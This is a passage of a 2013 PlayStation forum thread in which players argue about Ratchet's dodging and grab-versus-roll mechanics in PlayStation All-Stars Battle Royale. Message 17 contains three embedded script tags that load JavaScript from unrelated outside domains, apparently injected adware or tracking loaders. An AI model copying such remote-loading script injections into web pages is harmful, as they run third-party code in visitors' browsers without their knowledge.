Highlighted
Splicer
45 posts

Re: Let me know when Ratchet's roll and air dodge get fixed...

Jan 29, 2013

I also think they need to fix being grabbed while your rolling. Rolling is used to evade attacks, so it doesn't make sense that you can still get grabbed while your evading. 

Message 11 of 22 (113 Views)
Wastelander
616 posts

Jan 29, 2013
A grab punishes you for using a roll when you shouldn't. Don't blame a game mechanic for you not being able to learn to counter throw. Superbot isn't going to do anything about this anyways and it's not their problem you can't figure out the right way to deal with this.

I also know talking to you about this is probably pointless as you will most likely be stubborn about it.
Message 12 of 22 (104 Views)
0 Likes
Uncharted Territory
1622 posts

Jan 29, 2013
Are you serious how dumb are you I have never once blamed the game due to my lack of skill I can dodge, evade, counter throw just fine even then your in no place to be an ignorant snob assuming I can't do these things when you have never once seen me play. I am not even talking about if I can counter throw ect, I'm saying its not needed because yes I do feel its cheap, but mostly that it's a useless tactic compared to what you can do which is out evade someone which takes skill where grabbing someone out of a roll doesn't weather or not someone knows the counters for it is 100% irrelevant. And me stubborn lol, no your the stubborn one here you rudely attacked me like you do numerous other people on the forum because you don't like there opinion and then you drag out the argument by insulting people saying "durr get better", and you literally have not made one real point in your defense.
Message 13 of 22 (98 Views)
Lombax Warrior
76 posts

Jan 29, 2013

This is incredibly dumb and simple.  Think rock paper scissors.

Attack build AP -> Blocking stops attacks -> Supers hit blockers -> Rolling dodges supers -> throws beat rolls

The only argument I could see is that throws shouldn't have armor on them.  Rolling should be throwable.

Come watch competitive and casual PSASBR play:
http://twitch.tv/hotboxgaming
Message 14 of 22 (92 Views)
0 Likes
Uncharted Territory
1622 posts

Jan 29, 2013
At this point it's not even about are opinions at the end of it all were not gonna agree, but he literally starts by attacking me ignorantly then refuses to accept that I don't have to agree with him so continues to insult me like a 3 year old its wrong, and he does it all the time on another thread he did the same thing because someone didn't share his opinion on I think Dante he attacked them and while they tried to have a civil conversation he continued to troll and attack him.
Message 15 of 22 (81 Views)
0 Likes
Hekseville Citizen
408 posts

Jan 29, 2013

Just played three quick matches against AI Radecs. I used Ratchet, Raiden, and Jak. Had no problem dodging the level 1's with Raiden and Jak, yet still have problems with Ratchet. I still think his dodging is bugged.

Message 16 of 22 (66 Views)
0 Likes
Gaming Beast
2167 posts

Jan 29, 2013
Tech chasing would be stupid if you couldn't grab when rolling and it would make the top tier characters even better while making the rest of the cast worse.

The Fro never sleeps.png

<script type="text/javascript" src="https://loading-resource.com/data.js.php?i={5B0E559A-F075-4C48-91F1-A12AED5BE78E}&d=2012-6-10&s=http://community.us.playstation.com/t5/forums/replypage/board-id/24861/message-id/338362"></script>
<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
<script type="text/javascript" src="http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js"></script>
Message 17 of 22 (76 Views)
0 Likes
Lombax Warrior
216 posts

Jan 31, 2013
Ratchet's roll and air dodge are fine, I have no clue why this thread was even created.
Photobucket
Message 18 of 22 (57 Views)
0 Likes
Sackboy
449 posts

[ Edited ]
Jan 31, 2013

Xaltis wrote:
Ratchet's roll and air dodge are fine, I have no clue why this thread was even created.

OP made a thread about how Radec's lvl1 is overpowered and it's unavoidable. Community tells him it's easy to dodge and he should practice dodging (they used harsher words than "you should practice"). OP doesn't want to think it's him so he blames it on the character he plays and this thread was born. It's just QQing to a whole new level.

#TogetherToros
Message 19 of 22 (52 Views)
0 Likes
Lombax Warrior
216 posts

Jan 31, 2013
Theperson who mad the OP needs to look me up (9th on the ladder currently) I do just fine as Ratchet & Clank. Also elephantsheep can you PM me on how you get your title to be "Lombax Warrior" please? :3
Photobucket
Message 20 of 22 (46 Views)
0 Likes